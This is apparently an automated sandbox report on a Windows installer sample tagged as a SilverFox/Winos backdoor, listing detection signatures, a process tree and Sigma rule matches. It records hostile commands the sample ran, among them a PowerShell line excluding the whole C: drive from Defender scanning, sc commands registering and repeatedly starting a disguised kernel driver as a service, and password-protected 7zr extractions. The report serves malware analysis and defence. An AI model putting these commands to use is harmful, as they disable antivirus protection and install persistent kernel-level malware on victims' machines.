Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U5b89#U88c5#U52a9#U624b_2.0.7.exe

Overview

General Information

Sample name:#U5b89#U88c5#U52a9#U624b_2.0.7.exe
renamed because original name is a hash value
Original sample name:_2.0.7.exe
Analysis ID:1579756
MD5:b7289fd08cd04c771fd7c9b06477601a
SHA1:a5b1ad8ed22e819341cadcc8a13ea34cf8a79eb1
SHA256:a9c6e43902b74d84e8492006beaf718380a1550cfd545a2de6bfc95d69016e28
Tags:backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • svchost.exe (PID: 5900 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6208 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 6344 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • #U5b89#U88c5#U52a9#U624b_2.0.7.exe (PID: 5496 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" MD5: B7289FD08CD04C771FD7C9B06477601A)
    • #U5b89#U88c5#U52a9#U624b_2.0.7.tmp (PID: 1424 cmdline: "C:\Users\user~1\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$10428,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" MD5: CCFB5265302C0ED10D4EE3C9C00B07B1)
      • powershell.exe (PID: 7192 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7580 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b_2.0.7.exe (PID: 7504 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT MD5: B7289FD08CD04C771FD7C9B06477601A)
        • #U5b89#U88c5#U52a9#U624b_2.0.7.tmp (PID: 7520 cmdline: "C:\Users\user~1\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$3043E,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT MD5: CCFB5265302C0ED10D4EE3C9C00B07B1)
          • 7zr.exe (PID: 7676 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 7760 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6688 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 2012 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7328 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cmd.exe (PID: 7636 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7656 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7840 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7856 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7872 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7900 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7964 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7980 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8024 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8040 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8096 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8108 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8164 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8180 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7248 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7028 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7000 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1660 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6708 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6132 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 744 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3088 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1168 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1252 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1588 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2040 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1964 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1928 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7752 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2168 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7748 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7680 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2860 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7836 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7800 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7788 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7884 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7908 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7916 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7972 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8004 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8036 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8084 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8128 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8172 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5908 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7248 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7080 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1260 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1424 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1912 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$10428,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, ParentProcessId: 1424, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7192, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7636, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7656, ProcessName: sc.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$10428,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, ParentProcessId: 1424, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7192, ProcessName: powershell.exe
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$10428,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$10428,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, NewProcessName: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, OriginalFileName: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, ParentCommandLine: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe", ParentImage: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe, ParentProcessId: 5496, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$10428,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" , ProcessId: 1424, ProcessName: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7636, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7656, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$10428,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, ParentProcessId: 1424, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7192, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 5900, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeVirustotal: Detection: 9%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 89.0% probability
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 00000013.00000003.1399275561.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 00000013.00000003.1399237456.0000000003550000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.19.dr
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C9698B0 FindFirstFileA,FindClose,FindClose,12_2_6C9698B0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_009B6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,17_2_009B6868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_009B7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,17_2_009B7496
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: time.windows.com
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000003CA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.12.dr, update.vac.12.dr, update.vac.6.dr, 7zr.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000003CA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.12.dr, update.vac.12.dr, update.vac.6.dr, 7zr.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000003CA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.12.dr, update.vac.12.dr, update.vac.6.dr, 7zr.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000003CA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.12.dr, update.vac.12.dr, update.vac.6.dr, 7zr.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000003CA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.12.dr, update.vac.12.dr, update.vac.6.dr, 7zr.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000003CA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.12.dr, update.vac.12.dr, update.vac.6.dr, 7zr.exe.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000003CA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.12.dr, update.vac.12.dr, update.vac.6.dr, 7zr.exe.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000003CA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.12.dr, update.vac.12.dr, update.vac.6.dr, 7zr.exe.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000003CA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.12.dr, update.vac.12.dr, update.vac.6.dr, 7zr.exe.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
